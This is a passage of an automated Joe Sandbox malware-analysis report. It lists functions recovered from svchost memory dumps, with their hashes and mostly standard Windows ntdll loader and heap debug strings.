                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-523794902
                                                                                                                      • Opcode ID: 3850b26c3bda85a4648b8167c1fa9199b407555f131287f5ecc6364875fd5568
                                                                                                                      • Instruction ID: c38b78fa76bce9c20af8e93c7c9f72d0baf4c738a51a09236476f16e13542cb4
                                                                                                                      • Opcode Fuzzy Hash: 3850b26c3bda85a4648b8167c1fa9199b407555f131287f5ecc6364875fd5568
                                                                                                                      • Instruction Fuzzy Hash: 2342107520A3929FC714EF28C884B6AFBF5FF89244F0849ADE8858B381D734D945CB51
                                                                                                                      Function 0303ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                      • API String ID: 0-4098886588
                                                                                                                      • Opcode ID: c29788fd34ad46c6239f812ba7ad5808e2df54d8f5233ea9fe22bce6ac3634d4
                                                                                                                      • Instruction ID: 2c30334a6cd56d6b19be4901ba441756fcab1499555e76444ea8058b2b870e92
                                                                                                                      • Opcode Fuzzy Hash: c29788fd34ad46c6239f812ba7ad5808e2df54d8f5233ea9fe22bce6ac3634d4
                                                                                                                      • Instruction Fuzzy Hash: FB32D175E062698BEF61CF18CC94BEEB7BDAF46344F1841EAE449A7250D7719E808F40
                                                                                                                      Function 0304B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-122214566
                                                                                                                      • Opcode ID: 7d3117e8511920053ecdc57820405071bbf49d7f7e17f66daa0aae2d26bbd45b
                                                                                                                      • Instruction ID: d4e3e3cf048880577f1abdae1676c937f554fce221f0f11f7e44f459688eb057
                                                                                                                      • Opcode Fuzzy Hash: 7d3117e8511920053ecdc57820405071bbf49d7f7e17f66daa0aae2d26bbd45b
                                                                                                                      • Instruction Fuzzy Hash: 98C14EB1A03315ABDF24DB69C8807BEB7E5AF85700F188479E8859F781E7B4DA44C391
                                                                                                                      Function 030663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      • Opcode ID: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                      • Instruction ID: 0cc449c92972e385953434e43e3ee60f8936641a758e5d9818cfb549888848f2
                                                                                                                      • Opcode Fuzzy Hash: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                      • Instruction Fuzzy Hash: F1915934A03B18ABDB38EF99E844BAEB7A5EF85B14F040528E4106F785D7B59851C7A0
                                                                                                                      Function 03062674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 030A2180
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 030A2160, 030A219A, 030A21BA
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 030A219F
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 030A2178
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 030A21BF
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 030A2165
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                      • Instruction ID: 700d3b0ed54de3d77a6aee8cfacbb53363c671a54a1c541db9b5a44fb90ef445
                                                                                                                      • Opcode Fuzzy Hash: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                      • Instruction Fuzzy Hash: 4F310936F83215BBE721CA9D9C41F9FB6BCDBA4E50F054869FA046B145D270DA00C7A1
                                                                                                                      Function 0306C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0306C6C4
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 030A8170
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 030A8177, 030A81EB
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0306C6C3
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 030A8181, 030A81F5
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 030A81E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 3bbc8648944c7d60947b594816dbcdb1f552c451a092ec18dd784c1b6e8e5d28
                                                                                                                      • Instruction ID: a6558abb29b1cdd9abae7e30a532531a06809cde5b4b928ddc4c0c06a59165e8
                                                                                                                      • Opcode Fuzzy Hash: 3bbc8648944c7d60947b594816dbcdb1f552c451a092ec18dd784c1b6e8e5d28
                                                                                                                      • Instruction Fuzzy Hash: 6231F375746705AFD224EF68DD46E6BB7E4EFC4B10F040958F885AF295E620EC04CBA2
                                                                                                                      Function 030B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                      • API String ID: 0-3127649145
                                                                                                                      • Opcode ID: b07c726d70b6e6adbd3702c6002b0fb3a88ebadb2f14a3471600df60eb605af2
                                                                                                                      • Instruction ID: aee7c5e36bd83a5b7399a5c8c9450fe8bd8997841b5e599d65eeb0c07547d5a4
                                                                                                                      • Opcode Fuzzy Hash: b07c726d70b6e6adbd3702c6002b0fb3a88ebadb2f14a3471600df60eb605af2
                                                                                                                      • Instruction Fuzzy Hash: F7323B75A027199BDB61DF25CC88BDAB7F8FF88300F1045EAE509A7650DB71AA84CF50
                                                                                                                      Function 03049950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                      • API String ID: 0-3393094623
                                                                                                                      • Opcode ID: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                      • Instruction ID: 4bcb6670c40c0dfe7f1bce0ecb400252e2bb96e80197783a4f9f79f2ad721649
                                                                                                                      • Opcode Fuzzy Hash: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                      • Instruction Fuzzy Hash: 88025AB150A3418FD760CF64C184BABF7E4BF89704F44897EE9998B250D770DA44CB92
                                                                                                                      Function 030551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0305527B
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 03055247
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0305542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0305522A
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03055352
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      • API String ID: 0-258546922
                                                                                                                      • Opcode ID: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                      • Instruction ID: d3a670c5fff728fb91cc23997bdaa614f29bb1a971f3ae026e027ebba76aaaa1
                                                                                                                      • Opcode Fuzzy Hash: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                      • Instruction Fuzzy Hash: C7F14B76D02218EFDF15DF98C980AEFBBF9EF49650F15406AE906AB250D7709E01CB90
                                                                                                                      Function 030B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                      • API String ID: 0-2518169356
                                                                                                                      • Opcode ID: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                      • Instruction ID: 78b1ec008ab54ec97fa34f6ed83595b298b8afa8dbd48a85112efcd75a2f0c1d
                                                                                                                      • Opcode Fuzzy Hash: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                      • Instruction Fuzzy Hash: 6591D072D1261A9BCB20CF69C881AFEB7F4EF89310F1945A9E810EB350D735DA01CB90
                                                                                                                      Function 0305D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1975516107
                                                                                                                      • Opcode ID: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                      • Instruction ID: 043190974577d1f05ba0be4749278d239ffa483fbf0f3a6e0fd6bcaf2d32a6e9
                                                                                                                      • Opcode Fuzzy Hash: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                      • Instruction Fuzzy Hash: CD510375A02349DFDB24EFA4C4847EEBBF2FF48314F18455AE8016B291D770A991CB90
                                                                                                                      Function 030276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      • API String ID: 0-3061284088
                                                                                                                      • Opcode ID: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                      • Instruction ID: 178e2b33569a7599ccf2c62b92203e0183e62276ddb19d5d6d6fc08a6505e862
                                                                                                                      • Opcode Fuzzy Hash: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                      • Instruction Fuzzy Hash: 0501283611B260EEE22AF319940DF9AFBD4DB82E70F18405AE0544F592CEA89880CA20
                                                                                                                      Function 030470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: 2c6698e3b3039f830c9a4d5461e9ee171fdd6813e35280ac4db9a577e086bc52
                                                                                                                      • Instruction ID: e0e0aed767fe6c51dbdd31eb3168c3cffd1def072507e0b6c83ea2093e76b1ba
                                                                                                                      • Opcode Fuzzy Hash: 2c6698e3b3039f830c9a4d5461e9ee171fdd6813e35280ac4db9a577e086bc52
                                                                                                                      • Instruction Fuzzy Hash: 9813BCB0A02615DFDB68CF68C4807ADFBF1BF49704F1885A9D859AB381D735AA41CF90
                                                                                                                      Function 03041070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3570731704
                                                                                                                      • Opcode ID: d14d6012b9b2d8724026a89aef4c431724ae577aebf76ebf2f04ced9db8142dc
                                                                                                                      • Instruction ID: b9892dea3a93d9e4361baa43708e2659e12f76cba9b57b75825e6e8f5424e4d7
                                                                                                                      • Opcode Fuzzy Hash: d14d6012b9b2d8724026a89aef4c431724ae577aebf76ebf2f04ced9db8142dc
                                                                                                                      • Instruction Fuzzy Hash: 00926BB5A02229CFEB65CF19CC40BA9B7B5BF45314F0981EAD949AB290D7349EC0CF51
                                                                                                                      Function 0304A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03097D03
                                                                                                                      • SsHd, xrefs: 0304A885
                                                                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03097D56
                                                                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03097D39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                      • API String ID: 0-2905229100
                                                                                                                      • Opcode ID: 19e451334ea185890289826646bffd7b1cabe86c60be5fc03107ab092ff4dce0
                                                                                                                      • Instruction ID: 68138096667b3e84b5d33d61d122584fbc7bb0b796160104a4058b7d6e2391f2
                                                                                                                      • Opcode Fuzzy Hash: 19e451334ea185890289826646bffd7b1cabe86c60be5fc03107ab092ff4dce0
                                                                                                                      • Instruction Fuzzy Hash: C8D17FB6A422159FDF24CF98D8806ADF7F5FF48710F19406AE845AB341D371EA51CBA0
                                                                                                                      Function 03043D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: 5b1e11648d243ab8a065f1172377bf82975248a1216fdfbb92b1930fb81d20c8
                                                                                                                      • Instruction ID: d56efa8fd293008f0d2a094ebfbf2299af4a45f78b46d35a199a680cc01b6915
                                                                                                                      • Opcode Fuzzy Hash: 5b1e11648d243ab8a065f1172377bf82975248a1216fdfbb92b1930fb81d20c8
                                                                                                                      • Instruction Fuzzy Hash: E3E2B0B4A012159FDB64CF6AC490BADFBF1FF49304F1881A9D849AB385D734AA45CF90
                                                                                                                      Function 0303A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      • Opcode ID: 94693de77df291677fc9bd7b1b761589cc99a9e7a5081fe372ae4765c1d29396
                                                                                                                      • Instruction ID: a2f22c6f3ff2ce5c4933d435fd639cc267a189b984c3696db35e107eb3e5983c
                                                                                                                      • Opcode Fuzzy Hash: 94693de77df291677fc9bd7b1b761589cc99a9e7a5081fe372ae4765c1d29396
                                                                                                                      • Instruction Fuzzy Hash: 12C1787460A386DFDB11CF18C044BAAB7E8BF86704F048D6AF8D58B650E735CA49CB52
                                                                                                                      Function 03040C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 030955AE
                                                                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030954ED
                                                                                                                      • HEAP[%wZ]: , xrefs: 030954D1, 03095592
                                                                                                                      • HEAP: , xrefs: 030954E0, 030955A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                      • API String ID: 0-1657114761
                                                                                                                      • Opcode ID: 34d72509920e828fb7861e436f2630ef902294bfc62da8167ca290b37d0a26f2
                                                                                                                      • Instruction ID: 6e77dae0b0af3c811f4922b0b80cbfbaa275f8a7daa714a7a1d8ee69858aeec5
                                                                                                                      • Opcode Fuzzy Hash: 34d72509920e828fb7861e436f2630ef902294bfc62da8167ca290b37d0a26f2
                                                                                                                      • Instruction Fuzzy Hash: 1DA103B4606305DFDB24DF25C840BBAFBE5BF45300F18C579D5969B682D730AA44CB90
                                                                                                                      Function 0306273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 030A21D9, 030A22B1
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 030A22B6
                                                                                                                      • .Local, xrefs: 030628D8
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 030A21DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: 400c26ec1483dc1437b12f07c6fc425fee0954a10222e51591fada67e059b59f
                                                                                                                      • Instruction ID: ab00a894ef777e4ed3b4c4a9c1525d0ff4614fe7f52d1f3e91fa28b4657720c8
                                                                                                                      • Opcode Fuzzy Hash: 400c26ec1483dc1437b12f07c6fc425fee0954a10222e51591fada67e059b59f
                                                                                                                      • Instruction Fuzzy Hash: EDA1A435902229DFDB64CF94DC84BA9B3B9BF98314F1949F9D848AB255D7309E80CF90
                                                                                                                      Function 02661220 Relevance: 5.2, Strings: 4, Instructions: 216COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #HY$2Nd$gfff$gfff
                                                                                                                      • API String ID: 0-3836139364
                                                                                                                      • Opcode ID: 150e6a9a764ec30bd713754813fe0089fd7dd8d959168d91941e27480ef53a1c
                                                                                                                      • Instruction ID: dfc8e2a3ead9dee7c42adca9f0ad83a8ed5a85f7306a134e72dd6d36d4d8f940
                                                                                                                      • Opcode Fuzzy Hash: 150e6a9a764ec30bd713754813fe0089fd7dd8d959168d91941e27480ef53a1c
                                                                                                                      • Instruction Fuzzy Hash: 1B818D71E1064987CF04CFA9C8541EDF7B5EF99304F2482AAE819BF350EB719A81CB94
                                                                                                                      Function 0302F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      • API String ID: 0-2586055223
                                                                                                                      • Opcode ID: 51473d4af4ab5a16001a8c66178c9287bc9b5fcb85c662cd83902b6be772d811
                                                                                                                      • Instruction ID: cd169c4b661ddf551d2b8ad62587b4ed936b4eb82799c98fa2cd31418c870384
                                                                                                                      • Opcode Fuzzy Hash: 51473d4af4ab5a16001a8c66178c9287bc9b5fcb85c662cd83902b6be772d811
                                                                                                                      • Instruction Fuzzy Hash: D56126762077419FD721EB24D848F6BBBE8FF80754F0808A8F9958B691D734D941CB61
                                                                                                                      Function 030E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      • API String ID: 0-336120773
                                                                                                                      • Opcode ID: e7538718cc7c0a95a180c5b0432dd44e1cf8d26612ffd48d45e0bf918396db5c
                                                                                                                      • Instruction ID: f182c76e1fd723074562ca80331057c3fa615ddfa4687c06317b6313be3e3210
                                                                                                                      • Opcode Fuzzy Hash: e7538718cc7c0a95a180c5b0432dd44e1cf8d26612ffd48d45e0bf918396db5c
                                                                                                                      • Instruction Fuzzy Hash: 7B31EB35313210EFD759EB98CC85FAAB7E8EF49620F180459E411CB291EA70EC50CBA5
                                                                                                                      Function 03029148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
